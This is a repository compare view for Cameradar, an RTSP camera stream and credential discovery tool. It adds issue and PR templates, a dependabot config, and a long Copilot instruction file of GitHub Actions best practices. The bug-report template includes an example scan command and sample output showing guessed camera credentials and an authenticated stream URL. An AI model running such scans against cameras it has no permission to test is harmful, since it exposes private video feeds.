Compare commits
77 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| c37d584aa2 | |||
| fd0d948c16 | |||
| 7bd7460b5b | |||
| 69f4fb418a | |||
| 18ffb7af61 | |||
| c11e3217ea | |||
| d16443109a | |||
| f93f9c9780 | |||
| 55d11e2887 | |||
| f192139cc3 | |||
| af41fc6cb8 | |||
| 777bd2a488 | |||
| 99c2e55ec4 | |||
| bf720fcea2 | |||
| e81eeb0c4d | |||
| f586940b6c | |||
| bcb8933261 | |||
| 73542f9efe | |||
| a3695e3e6a | |||
| ba9da112db | |||
| 1b91e5441f | |||
| d73878a1e1 | |||
| 1cc3eaa0fa | |||
| bf65c3cf45 | |||
| 456a1508c0 | |||
| 3991f1625f | |||
| 4c1493506d | |||
| 80e75061da | |||
| 5b48737cc7 | |||
| da2dac70ac | |||
| 8c8ea1209b | |||
| df3718a06c | |||
| 6486d04e61 | |||
| 96928ac43c | |||
| 8e7de3f59e | |||
| fbc0b7a66d | |||
| 78eda6672e | |||
| 9f05634531 | |||
| defc308a9d | |||
| 9a6c030a74 | |||
| afe2caddd6 | |||
| 8349bc7c3a | |||
| 04ab1cfc8d | |||
| d233fd850e | |||
| 948aca316b | |||
| 3f05737bf2 | |||
| 4aabf47a5d | |||
| cb47aef7e4 | |||
| bb05fcff6f | |||
| 8634ba84ca | |||
| 3bd6b9171e | |||
| 18a933ba45 | |||
| 0187d9a553 | |||
| 7672da5b6d | |||
| 966266f742 | |||
| 0738d08966 | |||
| 4603096b93 | |||
| a5d3455333 | |||
| c83f961ffc | |||
| a6ed312eaf | |||
| 35b0cf26d9 | |||
| 0f011a1797 | |||
| 7719110f1e | |||
| 212ac2f0d5 | |||
| 2e49587cc2 | |||
| 47285675b9 | |||
| 2678df2e4c | |||
| 862e9f3de9 | |||
| 260a9645be | |||
| 1d5d606085 | |||
| c249be1cc0 | |||
| 1ec3a5fe44 | |||
| 3b082ea736 | |||
| b6ebd468c6 | |||
| ceb210f281 | |||
| fcb627dccd | |||
| 098460702b |
@@ -0,0 +1,103 @@
|
||||
name: Bug report
|
||||
description: Create a report to help Cameradar improve
|
||||
labels:
|
||||
- needs-triage
|
||||
body:
|
||||
- type: markdown
|
||||
attributes:
|
||||
value: |
|
||||
Please make sure your problem is not already addressed in another issue.
|
||||
- type: textarea
|
||||
id: description
|
||||
attributes:
|
||||
label: Description
|
||||
description: Please give a clear and concise description of the bug.
|
||||
validations:
|
||||
required: true
|
||||
- type: textarea
|
||||
id: version
|
||||
attributes:
|
||||
label: Cameradar version
|
||||
description: Output of `cameradar version`
|
||||
render: bash
|
||||
placeholder: |
|
||||
Version: v6.0.2-SNAPSHOT-c11e321
|
||||
Commit: c11e3217ea0b1ea9e45d0da4c072e07775bde68c
|
||||
Build date: 2026-02-03T10:02:30Z
|
||||
Nmap: 7.94SVN
|
||||
validations:
|
||||
required: true
|
||||
- type: dropdown
|
||||
id: env
|
||||
attributes:
|
||||
label: Environment
|
||||
description: How do you run cameradar?
|
||||
options:
|
||||
- "`ullaakut/cameradar` docker image"
|
||||
- Precompiled binary from GitHub releases
|
||||
- Custom docker image
|
||||
- Custom binary build
|
||||
default: 0
|
||||
validations:
|
||||
required: true
|
||||
- type: textarea
|
||||
id: os
|
||||
attributes:
|
||||
label: Operating system
|
||||
description: Operating system where you run cameradar.
|
||||
render: bash
|
||||
placeholder: |
|
||||
- OS: <Windows | macOS | Linux | Other>
|
||||
- OS version: <version>
|
||||
- Architecture: <arch>
|
||||
validations:
|
||||
required: false
|
||||
- type: textarea
|
||||
id: cmd
|
||||
attributes:
|
||||
label: Command
|
||||
description: The command that you ran and all of its arguments. Make sure to redact any sensitive information. Make sure to run your command in debug mode.
|
||||
placeholder: |
|
||||
E.g. `docker run --net=host -it ullaakut/cameradar -t localhost --debug`
|
||||
validations:
|
||||
required: true
|
||||
- type: textarea
|
||||
id: output
|
||||
attributes:
|
||||
label: Output logs
|
||||
description: Output of the command you ran, including any error messages. Make sure to redact any sensitive information.
|
||||
placeholder: |
|
||||
2026-02-03T09:33:24Z [INFO] Startup: Running cameradar version 6.0.2-SNAPSHOT-75bf524, commit 75bf524
|
||||
2026-02-03T09:33:24Z [INFO] Startup: targets: localhost
|
||||
2026-02-03T09:33:24Z [INFO] Startup: ports: 554, 5554, 8554, http
|
||||
...
|
||||
Accessible streams: 1
|
||||
• 127.0.0.1:8554 (GStreamer rtspd)
|
||||
Authentication: digest
|
||||
Routes: live.sdp
|
||||
Credentials: admin:12345
|
||||
Availability: yes
|
||||
RTSP URL: rtsp://admin:12345@127.0.0.1:8554/live.sdp
|
||||
Admin panel: http://127.0.0.1/
|
||||
- type: textarea
|
||||
id: expected
|
||||
attributes:
|
||||
label: Expected behavior
|
||||
description: What is the expected behavior?
|
||||
placeholder: |
|
||||
E.g. "Cameradar should have been able to find the camera's RTSP stream using the provided credentials."
|
||||
- type: textarea
|
||||
id: additional
|
||||
attributes:
|
||||
label: Additional Info
|
||||
description: Additional info you want to provide such as system info, target info, network conditions etc.
|
||||
validations:
|
||||
required: false
|
||||
- type: checkboxes
|
||||
id: terms
|
||||
attributes:
|
||||
label: Code of Conduct
|
||||
description: By submitting this issue, you agree to follow our [Code of Conduct](https://github.com/Ullaakut/cameradar/blob/master/CODE_OF_CONDUCT.md).
|
||||
options:
|
||||
- label: I agree to follow this project's Code of Conduct
|
||||
required: true
|
||||
@@ -0,0 +1,5 @@
|
||||
blank_issues_enabled: false
|
||||
contact_links:
|
||||
- name: Cameradar Community discussion board
|
||||
url: https://github.com/Ullaakut/cameradar/discussions
|
||||
about: Please ask and answer questions here.
|
||||
@@ -0,0 +1,31 @@
|
||||
name: Feature request
|
||||
description: Propose a feature or enhancement to help Cameradar improve
|
||||
labels:
|
||||
- needs-triage
|
||||
body:
|
||||
- type: markdown
|
||||
attributes:
|
||||
value: |
|
||||
Please make sure your request is not already proposed in another issue.
|
||||
- type: textarea
|
||||
id: description
|
||||
attributes:
|
||||
label: Description
|
||||
description: Please give a clear and concise description of the feature request.
|
||||
validations:
|
||||
required: true
|
||||
- type: textarea
|
||||
id: additional
|
||||
attributes:
|
||||
label: Additional Info
|
||||
description: Additional info you want to provide.
|
||||
validations:
|
||||
required: false
|
||||
- type: checkboxes
|
||||
id: terms
|
||||
attributes:
|
||||
label: Code of Conduct
|
||||
description: By submitting this issue, you agree to follow our [Code of Conduct](https://github.com/Ullaakut/cameradar/blob/master/CODE_OF_CONDUCT.md).
|
||||
options:
|
||||
- label: I agree to follow this project's Code of Conduct
|
||||
required: true
|
||||
@@ -0,0 +1,11 @@
|
||||
## Goal of this PR
|
||||
|
||||
<!-- A brief description of the change being made with this pull request. -->
|
||||
|
||||
<!--
|
||||
Fixes [#XXX](https://github.com/Ulaakut/cameradar/issues/XXX)
|
||||
-->
|
||||
|
||||
## How did I test it?
|
||||
|
||||
<!-- A brief description the steps taken to test this pull request. -->
|
||||
@@ -0,0 +1,20 @@
|
||||
version: 2
|
||||
updates:
|
||||
- package-ecosystem: gomod
|
||||
directory: "/"
|
||||
schedule:
|
||||
interval: weekly
|
||||
groups:
|
||||
all:
|
||||
patterns:
|
||||
- "*"
|
||||
open-pull-requests-limit: 10
|
||||
- package-ecosystem: "github-actions"
|
||||
directory: "/"
|
||||
schedule:
|
||||
interval: weekly
|
||||
groups:
|
||||
all:
|
||||
patterns:
|
||||
- "*"
|
||||
open-pull-requests-limit: 10
|
||||
@@ -0,0 +1,637 @@
|
||||
---
|
||||
applyTo: '.github/workflows/*.yml'
|
||||
description: 'Comprehensive guide for building robust, secure, and efficient CI/CD pipelines using GitHub Actions. Covers workflow structure, jobs, steps, environment variables, secret management, caching, matrix strategies, testing, and deployment strategies.'
|
||||
---
|
||||
|
||||
# GitHub Actions CI/CD Best Practices
|
||||
|
||||
## Your Mission
|
||||
|
||||
As GitHub Copilot, you are an expert in designing and optimizing CI/CD pipelines using GitHub Actions. Your mission is to assist developers in creating efficient, secure, and reliable automated workflows for building, testing, and deploying their applications. You must prioritize best practices, ensure security, and provide actionable, detailed guidance.
|
||||
|
||||
## Core Concepts and Structure
|
||||
|
||||
### **1. Workflow Structure (`.github/workflows/*.yml`)**
|
||||
|
||||
- **Principle:** Workflows should be clear, modular, and easy to understand, promoting reusability and maintainability.
|
||||
- **Deeper Dive:**
|
||||
- **Naming Conventions:** Use consistent, descriptive names for workflow files (e.g., `build-and-test.yml`, `deploy-prod.yml`).
|
||||
- **Triggers (`on`):** Understand the full range of events: `push`, `pull_request`, `workflow_dispatch` (manual), `schedule` (cron jobs), `repository_dispatch` (external events), `workflow_call` (reusable workflows).
|
||||
- **Concurrency:** Use `concurrency` to prevent simultaneous runs for specific branches or groups, avoiding race conditions or wasted resources.
|
||||
- **Permissions:** Define `permissions` at the workflow level for a secure default, overriding at the job level if needed.
|
||||
- **Guidance for Copilot:**
|
||||
- Always start with a descriptive `name` and appropriate `on` trigger. Suggest granular triggers for specific use cases (e.g., `on: push: branches: [main]` vs. `on: pull_request`).
|
||||
- Recommend using `workflow_dispatch` for manual triggers, allowing input parameters for flexibility and controlled deployments.
|
||||
- Advise on setting `concurrency` for critical workflows or shared resources to prevent resource contention.
|
||||
- Guide on setting explicit `permissions` for `GITHUB_TOKEN` to adhere to the principle of least privilege.
|
||||
- **Pro Tip:** For complex repositories, consider using reusable workflows (`workflow_call`) to abstract common CI/CD patterns and reduce duplication across multiple projects.
|
||||
|
||||
### **2. Jobs**
|
||||
|
||||
- **Principle:** Jobs should represent distinct, independent phases of your CI/CD pipeline (e.g., build, test, deploy, lint, security scan).
|
||||
- **Deeper Dive:**
|
||||
- **`runs-on`:** Choose appropriate runners. `ubuntu-latest` is common, but `windows-latest`, `macos-latest`, or `self-hosted` runners are available for specific needs.
|
||||
- **`needs`:** Clearly define dependencies. If Job B `needs` Job A, Job B will only run after Job A successfully completes.
|
||||
- **`outputs`:** Pass data between jobs using `outputs`. This is crucial for separating concerns (e.g., build job outputs artifact path, deploy job consumes it).
|
||||
- **`if` Conditions:** Leverage `if` conditions extensively for conditional execution based on branch names, commit messages, event types, or previous job status (`if: success()`, `if: failure()`, `if: always()`).
|
||||
- **Job Grouping:** Consider breaking large workflows into smaller, more focused jobs that run in parallel or sequence.
|
||||
- **Guidance for Copilot:**
|
||||
- Define `jobs` with clear `name` and appropriate `runs-on` (e.g., `ubuntu-latest`, `windows-latest`, `self-hosted`).
|
||||
- Use `needs` to define dependencies between jobs, ensuring sequential execution and logical flow.
|
||||
- Employ `outputs` to pass data between jobs efficiently, promoting modularity.
|
||||
- Utilize `if` conditions for conditional job execution (e.g., deploy only on `main` branch pushes, run E2E tests only for certain PRs, skip jobs based on file changes).
|
||||
- **Example (Conditional Deployment and Output Passing):**
|
||||
```yaml
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
outputs:
|
||||
artifact_path: ${{ steps.package_app.outputs.path }}
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v4
|
||||
- name: Setup Node.js
|
||||
uses: actions/setup-node@v3
|
||||
with:
|
||||
node-version: 18
|
||||
- name: Install dependencies and build
|
||||
run: |
|
||||
npm ci
|
||||
npm run build
|
||||
- name: Package application
|
||||
id: package_app
|
||||
run: | # Assume this creates a 'dist.zip' file
|
||||
zip -r dist.zip dist
|
||||
echo "path=dist.zip" >> "$GITHUB_OUTPUT"
|
||||
- name: Upload build artifact
|
||||
uses: actions/upload-artifact@v3
|
||||
with:
|
||||
name: my-app-build
|
||||
path: dist.zip
|
||||
|
||||
deploy-staging:
|
||||
runs-on: ubuntu-latest
|
||||
needs: build
|
||||
if: github.ref == 'refs/heads/develop' || github.ref == 'refs/heads/main'
|
||||
environment: staging
|
||||
steps:
|
||||
- name: Download build artifact
|
||||
uses: actions/download-artifact@v3
|
||||
with:
|
||||
name: my-app-build
|
||||
- name: Deploy to Staging
|
||||
run: |
|
||||
unzip dist.zip
|
||||
echo "Deploying ${{ needs.build.outputs.artifact_path }} to staging..."
|
||||
# Add actual deployment commands here
|
||||
```
|
||||
|
||||
### **3. Steps and Actions**
|
||||
|
||||
- **Principle:** Steps should be atomic, well-defined, and actions should be versioned for stability and security.
|
||||
- **Deeper Dive:**
|
||||
- **`uses`:** Referencing marketplace actions (e.g., `actions/checkout@v4`, `actions/setup-node@v3`) or custom actions. Always pin to a full length commit SHA for maximum security and immutability, or at least a major version tag (e.g., `@v4`). Avoid pinning to `main` or `latest`.
|
||||
- **`name`:** Essential for clear logging and debugging. Make step names descriptive.
|
||||
- **`run`:** For executing shell commands. Use multi-line scripts for complex logic and combine commands to optimize layer caching in Docker (if building images).
|
||||
- **`env`:** Define environment variables at the step or job level. Do not hardcode sensitive data here.
|
||||
- **`with`:** Provide inputs to actions. Ensure all required inputs are present.
|
||||
- **Guidance for Copilot:**
|
||||
- Use `uses` to reference marketplace or custom actions, always specifying a secure version (tag or SHA).
|
||||
- Use `name` for each step for readability in logs and easier debugging.
|
||||
- Use `run` for shell commands, combining commands with `&&` for efficiency and using `|` for multi-line scripts.
|
||||
- Provide `with` inputs for actions explicitly, and use expressions (`${{ }}`) for dynamic values.
|
||||
- **Security Note:** Audit marketplace actions before use. Prefer actions from trusted sources (e.g., `actions/` organization) and review their source code if possible. Use `dependabot` for action version updates.
|
||||
|
||||
## Security Best Practices in GitHub Actions
|
||||
|
||||
### **1. Secret Management**
|
||||
|
||||
- **Principle:** Secrets must be securely managed, never exposed in logs, and only accessible by authorized workflows/jobs.
|
||||
- **Deeper Dive:**
|
||||
- **GitHub Secrets:** The primary mechanism for storing sensitive information. Encrypted at rest and only decrypted when passed to a runner.
|
||||
- **Environment Secrets:** For greater control, create environment-specific secrets, which can be protected by manual approvals or specific branch conditions.
|
||||
- **Secret Masking:** GitHub Actions automatically masks secrets in logs, but it's good practice to avoid printing them directly.
|
||||
- **Minimize Scope:** Only grant access to secrets to the workflows/jobs that absolutely need them.
|
||||
- **Guidance for Copilot:**
|
||||
- Always instruct users to use GitHub Secrets for sensitive information (e.g., API keys, passwords, cloud credentials, tokens).
|
||||
- Access secrets via `secrets.<SECRET_NAME>` in workflows.
|
||||
- Recommend using environment-specific secrets for deployment environments to enforce stricter access controls and approvals.
|
||||
- Advise against constructing secrets dynamically or printing them to logs, even if masked.
|
||||
- **Example (Environment Secrets with Approval):**
|
||||
```yaml
|
||||
jobs:
|
||||
deploy:
|
||||
runs-on: ubuntu-latest
|
||||
environment:
|
||||
name: production
|
||||
url: https://prod.example.com
|
||||
steps:
|
||||
- name: Deploy to production
|
||||
env:
|
||||
PROD_API_KEY: ${{ secrets.PROD_API_KEY }}
|
||||
run: ./deploy-script.sh
|
||||
```
|
||||
|
||||
### **2. OpenID Connect (OIDC) for Cloud Authentication**
|
||||
|
||||
- **Principle:** Use OIDC for secure, credential-less authentication with cloud providers (AWS, Azure, GCP, etc.), eliminating the need for long-lived static credentials.
|
||||
- **Deeper Dive:**
|
||||
- **Short-Lived Credentials:** OIDC exchanges a JWT token for temporary cloud credentials, significantly reducing the attack surface.
|
||||
- **Trust Policies:** Requires configuring identity providers and trust policies in your cloud environment to trust GitHub's OIDC provider.
|
||||
- **Federated Identity:** This is a key pattern for modern, secure cloud deployments.
|
||||
- **Guidance for Copilot:**
|
||||
- Strongly recommend OIDC for authenticating with AWS, Azure, GCP, and other cloud providers instead of storing long-lived access keys as secrets.
|
||||
- Provide examples of how to configure the OIDC action for common cloud providers (e.g., `aws-actions/configure-aws-credentials@v4`).
|
||||
- Explain the concept of trust policies and how they relate to OIDC setup.
|
||||
- **Pro Tip:** OIDC is a fundamental shift towards more secure cloud deployments and should be prioritized whenever possible.
|
||||
|
||||
### **3. Least Privilege for `GITHUB_TOKEN`**
|
||||
|
||||
- **Principle:** Grant only the necessary permissions to the `GITHUB_TOKEN` for your workflows, reducing the blast radius in case of compromise.
|
||||
- **Deeper Dive:**
|
||||
- **Default Permissions:** By default, the `GITHUB_TOKEN` has broad permissions. This should be explicitly restricted.
|
||||
- **Granular Permissions:** Define `permissions` at the workflow or job level (e.g., `contents: read`, `pull-requests: write`, `issues: read`).
|
||||
- **Read-Only by Default:** Start with `contents: read` as the default and add write permissions only when strictly necessary.
|
||||
- **Guidance for Copilot:**
|
||||
- Configure `permissions` at the workflow or job level to restrict access. Always prefer `contents: read` as the default.
|
||||
- Advise against using `contents: write` or `pull-requests: write` unless the workflow explicitly needs to modify the repository.
|
||||
- Provide a clear mapping of common workflow needs to specific `GITHUB_TOKEN` permissions.
|
||||
- **Example (Least Privilege):**
|
||||
```yaml
|
||||
permissions:
|
||||
contents: read # Default is write, explicitly set to read-only for security
|
||||
pull-requests: write # Only if workflow needs to update PRs
|
||||
checks: write # For updating checks
|
||||
|
||||
jobs:
|
||||
lint:
|
||||
permissions:
|
||||
contents: read # This job only needs to read code, override workflow default
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- run: npm run lint
|
||||
```
|
||||
|
||||
### **4. Dependency Review and Software Composition Analysis (SCA)**
|
||||
|
||||
- **Principle:** Continuously scan dependencies for known vulnerabilities and licensing issues.
|
||||
- **Deeper Dive:**
|
||||
- **Early Detection:** Integrate dependency checks early in the CI pipeline to catch issues before deployment.
|
||||
- **Tools:** Use `dependency-review-action`, Snyk, Trivy, Mend (formerly WhiteSource).
|
||||
- **Supply Chain Security:** This is a critical component of securing your software supply chain.
|
||||
- **Guidance for Copilot:**
|
||||
- Integrate `dependency-review-action` or other SCA tools into the CI pipeline.
|
||||
- Recommend regular scanning for vulnerabilities in third-party libraries and setting up alerts for new findings.
|
||||
- Emphasize the importance of maintaining up-to-date dependency lists and understanding transitive dependencies.
|
||||
|
||||
### **5. Static Application Security Testing (SAST)**
|
||||
|
||||
- **Principle:** Identify security vulnerabilities in source code before runtime.
|
||||
- **Deeper Dive:**
|
||||
- **Shift Left:** SAST enables finding and fixing vulnerabilities early in the development lifecycle, which is more cost-effective.
|
||||
- **Tools:** CodeQL, SonarQube, Bandit (Python), ESLint with security plugins (JS/TS).
|
||||
- **Automated Enforcement:** Configure SAST to break builds or block PRs if critical vulnerabilities are found.
|
||||
- **Guidance for Copilot:**
|
||||
- Integrate SAST tools (e.g., CodeQL for GitHub Advanced Security, or open-source alternatives) into the CI pipeline.
|
||||
- Configure security scanning as a blocking step if critical vulnerabilities are found, enforcing a secure by default posture.
|
||||
- Suggest adding security linters or static analysis to pre-commit hooks for earlier feedback.
|
||||
|
||||
### **6. Secret Scanning and Credential Leak Prevention**
|
||||
|
||||
- **Principle:** Prevent secrets from being committed into the repository or exposed in logs.
|
||||
- **Deeper Dive:**
|
||||
- **GitHub Secret Scanning:** Built-in feature to detect secrets in your repository.
|
||||
- **Pre-commit Hooks:** Tools like `git-secrets` can prevent secrets from being committed locally.
|
||||
- **Environment Variables Only:** Secrets should only be passed to the environment where they are needed at runtime, never in the build artifact.
|
||||
- **Guidance for Copilot:**
|
||||
- Suggest enabling GitHub's built-in secret scanning for the repository.
|
||||
- Recommend implementing pre-commit hooks that scan for common secret patterns.
|
||||
- Advise reviewing workflow logs for accidental secret exposure, even with masking.
|
||||
|
||||
### **7. Immutable Infrastructure & Image Signing**
|
||||
|
||||
- **Principle:** Ensure that container images and deployed artifacts are tamper-proof and verified.
|
||||
- **Deeper Dive:**
|
||||
- **Reproducible Builds:** Ensure that building the same code always results in the exact same image.
|
||||
- **Image Signing:** Use tools like Notary or Cosign to cryptographically sign container images, verifying their origin and integrity.
|
||||
- **Deployment Gate:** Enforce that only signed images can be deployed to production environments.
|
||||
- **Guidance for Copilot:**
|
||||
- Advocate for reproducible builds in Dockerfiles and build processes.
|
||||
- Suggest integrating image signing into the CI pipeline and verification during deployment stages.
|
||||
|
||||
## Optimization and Performance
|
||||
|
||||
### **1. Caching GitHub Actions**
|
||||
|
||||
- **Principle:** Cache dependencies and build outputs to significantly speed up subsequent workflow runs.
|
||||
- **Deeper Dive:**
|
||||
- **Cache Hit Ratio:** Aim for a high cache hit ratio by designing effective cache keys.
|
||||
- **Cache Keys:** Use a unique key based on file hashes (e.g., `hashFiles('**/package-lock.json')`, `hashFiles('**/requirements.txt')`) to invalidate the cache only when dependencies change.
|
||||
- **Restore Keys:** Use `restore-keys` for fallbacks to older, compatible caches.
|
||||
- **Cache Scope:** Understand that caches are scoped to the repository and branch.
|
||||
- **Guidance for Copilot:**
|
||||
- Use `actions/cache@v3` for caching common package manager dependencies (Node.js `node_modules`, Python `pip` packages, Java Maven/Gradle dependencies) and build artifacts.
|
||||
- Design highly effective cache keys using `hashFiles` to ensure optimal cache hit rates.
|
||||
- Advise on using `restore-keys` to gracefully fall back to previous caches.
|
||||
- **Example (Advanced Caching for Monorepo):**
|
||||
```yaml
|
||||
- name: Cache Node.js modules
|
||||
uses: actions/cache@v3
|
||||
with:
|
||||
path: |
|
||||
~/.npm
|
||||
./node_modules # For monorepos, cache specific project node_modules
|
||||
key: ${{ runner.os }}-node-${{ hashFiles('**/package-lock.json') }}-${{ github.run_id }}
|
||||
restore-keys: |
|
||||
${{ runner.os }}-node-${{ hashFiles('**/package-lock.json') }}-
|
||||
${{ runner.os }}-node-
|
||||
```
|
||||
|
||||
### **2. Matrix Strategies for Parallelization**
|
||||
|
||||
- **Principle:** Run jobs in parallel across multiple configurations (e.g., different Node.js versions, OS, Python versions, browser types) to accelerate testing and builds.
|
||||
- **Deeper Dive:**
|
||||
- **`strategy.matrix`:** Define a matrix of variables.
|
||||
- **`include`/`exclude`:** Fine-tune combinations.
|
||||
- **`fail-fast`:** Control whether job failures in the matrix stop the entire strategy.
|
||||
- **Maximizing Concurrency:** Ideal for running tests across various environments simultaneously.
|
||||
- **Guidance for Copilot:**
|
||||
- Utilize `strategy.matrix` to test applications against different environments, programming language versions, or operating systems concurrently.
|
||||
- Suggest `include` and `exclude` for specific matrix combinations to optimize test coverage without unnecessary runs.
|
||||
- Advise on setting `fail-fast: true` (default) for quick feedback on critical failures, or `fail-fast: false` for comprehensive test reporting.
|
||||
- **Example (Multi-version, Multi-OS Test Matrix):**
|
||||
```yaml
|
||||
jobs:
|
||||
test:
|
||||
runs-on: ${{ matrix.os }}
|
||||
strategy:
|
||||
fail-fast: false # Run all tests even if one fails
|
||||
matrix:
|
||||
os: [ubuntu-latest, windows-latest]
|
||||
node-version: [16.x, 18.x, 20.x]
|
||||
browser: [chromium, firefox]
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: actions/setup-node@v3
|
||||
with:
|
||||
node-version: ${{ matrix.node-version }}
|
||||
- name: Install Playwright browsers
|
||||
run: npx playwright install ${{ matrix.browser }}
|
||||
- name: Run tests
|
||||
run: npm test
|
||||
```
|
||||
|
||||
### **3. Self-Hosted Runners**
|
||||
|
||||
- **Principle:** Use self-hosted runners for specialized hardware, network access to private resources, or environments where GitHub-hosted runners are cost-prohibitive.
|
||||
- **Deeper Dive:**
|
||||
- **Custom Environments:** Ideal for large build caches, specific hardware (GPUs), or access to on-premise resources.
|
||||
- **Cost Optimization:** Can be more cost-effective for very high usage.
|
||||
- **Security Considerations:** Requires securing and maintaining your own infrastructure, network access, and updates. This includes proper hardening of the runner machines, managing access controls, and ensuring timely patching.
|
||||
- **Scalability:** Plan for how self-hosted runners will scale with demand, either manually or using auto-scaling solutions.
|
||||
- **Guidance for Copilot:**
|
||||
- Recommend self-hosted runners when GitHub-hosted runners do not meet specific performance, cost, security, or network access requirements.
|
||||
- Emphasize the user's responsibility for securing, maintaining, and scaling self-hosted runners, including network configuration and regular security audits.
|
||||
- Advise on using runner groups to organize and manage self-hosted runners efficiently.
|
||||
|
||||
### **4. Fast Checkout and Shallow Clones**
|
||||
|
||||
- **Principle:** Optimize repository checkout time to reduce overall workflow duration, especially for large repositories.
|
||||
- **Deeper Dive:**
|
||||
- **`fetch-depth`:** Controls how much of the Git history is fetched. `1` for most CI/CD builds is sufficient, as only the latest commit is usually needed. A `fetch-depth` of `0` fetches the entire history, which is rarely needed and can be very slow for large repos.
|
||||
- **`submodules`:** Avoid checking out submodules if not required by the specific job. Fetching submodules adds significant overhead.
|
||||
- **`lfs`:** Manage Git LFS (Large File Storage) files efficiently. If not needed, set `lfs: false`.
|
||||
- **Partial Clones:** Consider using Git's partial clone feature (`--filter=blob:none` or `--filter=tree:0`) for extremely large repositories, though this is often handled by specialized actions or Git client configurations.
|
||||
- **Guidance for Copilot:**
|
||||
- Use `actions/checkout@v4` with `fetch-depth: 1` as the default for most build and test jobs to significantly save time and bandwidth.
|
||||
- Only use `fetch-depth: 0` if the workflow explicitly requires full Git history (e.g., for release tagging, deep commit analysis, or `git blame` operations).
|
||||
- Advise against checking out submodules (`submodules: false`) if not strictly necessary for the workflow's purpose.
|
||||
- Suggest optimizing LFS usage if large binary files are present in the repository.
|
||||
|
||||
### **5. Artifacts for Inter-Job and Inter-Workflow Communication**
|
||||
|
||||
- **Principle:** Store and retrieve build outputs (artifacts) efficiently to pass data between jobs within the same workflow or across different workflows, ensuring data persistence and integrity.
|
||||
- **Deeper Dive:**
|
||||
- **`actions/upload-artifact`:** Used to upload files or directories produced by a job. Artifacts are automatically compressed and can be downloaded later.
|
||||
- **`actions/download-artifact`:** Used to download artifacts in subsequent jobs or workflows. You can download all artifacts or specific ones by name.
|
||||
- **`retention-days`:** Crucial for managing storage costs and compliance. Set an appropriate retention period based on the artifact's importance and regulatory requirements.
|
||||
- **Use Cases:** Build outputs (executables, compiled code, Docker images), test reports (JUnit XML, HTML reports), code coverage reports, security scan results, generated documentation, static website builds.
|
||||
- **Limitations:** Artifacts are immutable once uploaded. Max size per artifact can be several gigabytes, but be mindful of storage costs.
|
||||
- **Guidance for Copilot:**
|
||||
- Use `actions/upload-artifact@v3` and `actions/download-artifact@v3` to reliably pass large files between jobs within the same workflow or across different workflows, promoting modularity and efficiency.
|
||||
- Set appropriate `retention-days` for artifacts to manage storage costs and ensure old artifacts are pruned.
|
||||
- Advise on uploading test reports, coverage reports, and security scan results as artifacts for easy access, historical analysis, and integration with external reporting tools.
|
||||
- Suggest using artifacts to pass compiled binaries or packaged applications from a build job to a deployment job, ensuring the exact same artifact is deployed that was built and tested.
|
||||
|
||||
## Comprehensive Testing in CI/CD (Expanded)
|
||||
|
||||
### **1. Unit Tests**
|
||||
|
||||
- **Principle:** Run unit tests on every code push to ensure individual code components (functions, classes, modules) function correctly in isolation. They are the fastest and most numerous tests.
|
||||
- **Deeper Dive:**
|
||||
- **Fast Feedback:** Unit tests should execute rapidly, providing immediate feedback to developers on code quality and correctness. Parallelization of unit tests is highly recommended.
|
||||
- **Code Coverage:** Integrate code coverage tools (e.g., Istanbul for JS, Coverage.py for Python, JaCoCo for Java) and enforce minimum coverage thresholds. Aim for high coverage, but focus on meaningful tests, not just line coverage.
|
||||
- **Test Reporting:** Publish test results using `actions/upload-artifact` (e.g., JUnit XML reports) or specific test reporter actions that integrate with GitHub Checks/Annotations.
|
||||
- **Mocking and Stubbing:** Emphasize the use of mocks and stubs to isolate units under test from their dependencies.
|
||||
- **Guidance for Copilot:**
|
||||
- Configure a dedicated job for running unit tests early in the CI pipeline, ideally triggered on every `push` and `pull_request`.
|
||||
- Use appropriate language-specific test runners and frameworks (Jest, Vitest, Pytest, Go testing, JUnit, NUnit, XUnit, RSpec).
|
||||
- Recommend collecting and publishing code coverage reports and integrating with services like Codecov, Coveralls, or SonarQube for trend analysis.
|
||||
- Suggest strategies for parallelizing unit tests to reduce execution time.
|
||||
|
||||
### **2. Integration Tests**
|
||||
|
||||
- **Principle:** Run integration tests to verify interactions between different components or services, ensuring they work together as expected. These tests typically involve real dependencies (e.g., databases, APIs).
|
||||
- **Deeper Dive:**
|
||||
- **Service Provisioning:** Use `services` within a job to spin up temporary databases, message queues, external APIs, or other dependencies via Docker containers. This provides a consistent and isolated testing environment.
|
||||
- **Test Doubles vs. Real Services:** Balance between mocking external services for pure unit tests and using real, lightweight instances for more realistic integration tests. Prioritize real instances when testing actual integration points.
|
||||
- **Test Data Management:** Plan for managing test data, ensuring tests are repeatable and data is cleaned up or reset between runs.
|
||||
- **Execution Time:** Integration tests are typically slower than unit tests. Optimize their execution and consider running them less frequently than unit tests (e.g., on PR merge instead of every push).
|
||||
- **Guidance for Copilot:**
|
||||
- Provision necessary services (databases like PostgreSQL/MySQL, message queues like RabbitMQ/Kafka, in-memory caches like Redis) using `services` in the workflow definition or Docker Compose during testing.
|
||||
- Advise on running integration tests after unit tests, but before E2E tests, to catch integration issues early.
|
||||
- Provide examples of how to set up `service` containers in GitHub Actions workflows.
|
||||
- Suggest strategies for creating and cleaning up test data for integration test runs.
|
||||
|
||||
### **3. End-to-End (E2E) Tests**
|
||||
|
||||
- **Principle:** Simulate full user behavior to validate the entire application flow from UI to backend, ensuring the complete system works as intended from a user's perspective.
|
||||
- **Deeper Dive:**
|
||||
- **Tools:** Use modern E2E testing frameworks like Cypress, Playwright, or Selenium. These provide browser automation capabilities.
|
||||
- **Staging Environment:** Ideally run E2E tests against a deployed staging environment that closely mirrors production, for maximum fidelity. Avoid running directly in CI unless resources are dedicated and isolated.
|
||||
- **Flakiness Mitigation:** Address flakiness proactively with explicit waits, robust selectors, retries for failed tests, and careful test data management. Flaky tests erode trust in the pipeline.
|
||||
- **Visual Regression Testing:** Consider integrating visual regression testing (e.g., Applitools, Percy) to catch UI discrepancies.
|
||||
- **Reporting:** Capture screenshots and video recordings on failure to aid debugging.
|
||||
- **Guidance for Copilot:**
|
||||
- Use tools like Cypress, Playwright, or Selenium for E2E testing, providing guidance on their setup within GitHub Actions.
|
||||
- Recommend running E2E tests against a deployed staging environment to catch issues before production and validate the full deployment process.
|
||||
- Configure test reporting, video recordings, and screenshots on failure to aid debugging and provide richer context for test results.
|
||||
